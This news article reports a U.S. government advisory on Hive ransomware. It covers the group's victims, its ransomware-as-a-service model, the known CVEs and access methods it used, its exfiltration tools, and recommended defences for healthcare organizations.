The Hive ransomware has racked up hundreds of critical infrastructure victims, especially healthcare and public health organizations, through phishing emails and the exploitation of known, Fortinet and Microsoft Exchange vulnerabilities, according to a new U.S. government agency cybersecurity advisory.
In the advisory, the FBI, CISA and the Department of Health and Human Services (HHS) said that Hive ransomware actors have victimized over 1,300 companies globally and have received $100 million in ransom payments as of November. Since its discovery in June 2021, Hive has rapidly expanded its reach and has also quickly evolved, as seen in a new variant observed in February that switched from the Go programming language to Rust.
“Hive ransomware follows the ransomware-as-a-service (RaaS) model in which developers create, maintain, and update the malware, and affiliates conduct the ransomware attacks,” according to the Thursday advisory. "From June 2021 through at least November 2022, threat actors have used Hive ransomware to target a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH)."
Because the ransomware affiliates deploying Hive rely on differing TTPs, the actors use various methods to gain initial access to victim networks. However, government agencies have mostly observed Hive being spread through phishing emails, exploitation of known vulnerabilities and vulnerable, external-facing remote services like Remote Desktop Protocol (RDP), or virtual private networks (VPN). In some instances the actors have exploited a known, critical improper authentication flaw in Fortinet's FortiOS SSL VPNs (CVE-2020-12812), for example. Hive actors have also exploited various Microsoft Exchange vulnerabilities like a feature bypass flaw (CVE-2021-31207), remote code execution bug (CVE-2021-34473) and privilege escalation issue (CVE-2021-34523).
Hive actors have carried out several anti-detection measures after gaining initial access to victim systems, including terminating processes related to backups and antivirus, removing all volume shadow copy services and deleting Windows event logs.
“Hive actors exfiltrate data likely using a combination of Rclone and the cloud storage service Mega.nz,” said researchers. “In addition to its capabilities against the Microsoft Windows operating system, Hive ransomware has known variants for Linux, VMware ESXi, and FreeBSD.”
Hive isn’t the only ransomware group to close in on the healthcare sector, which faces unique security issues due to the sensitive nature of critical care offered to patients and personal data involved. The FBI, CISA and HHS also recently warned of a cybercrime group called Daixin Team that has launched ransomware attacks against the healthcare and public health sector since at least June.
In a recent striking example of the impact of cyberattacks on the healthcare sector, systems at CommonSpirit Health, the second-largest non-profit hospital chain in the U.S., were pushed offline after a ransomware attack in early October, causing delays in surgeries and patient care. Government officials during the Aspen Institute Cyber Summit this week pointed to the CommonSpirit Health ransomware attack as an example of ransomware currently being at “unacceptable levels,” despite efforts by both the private and public sectors to help companies with their resilience and go after ransomware syndicates through increased law enforcement activity.
“We’ve only seen the [ransomware] problem get worse,” said Paul Abbate, deputy director with the FBI, during the Aspen Institute Cyber Summit. “It’s a highly profitable enterprise for criminal organizations to go after. We’ve seen a higher volume of ransomware attacks and the financial losses are only increasing as well. We’re going to have to come even closer together in preventing victims from being harmed.”
The FBI, CISA and HHS recommended that healthcare organizations take several measures to protect against ransomware attacks, including remediating known flaws (particularly the ones previously targeted by Hive), enabling multi-factor authentication with strong passwords, closing any unused ports and removing any application “not deemed necessary for day-to-day operations.”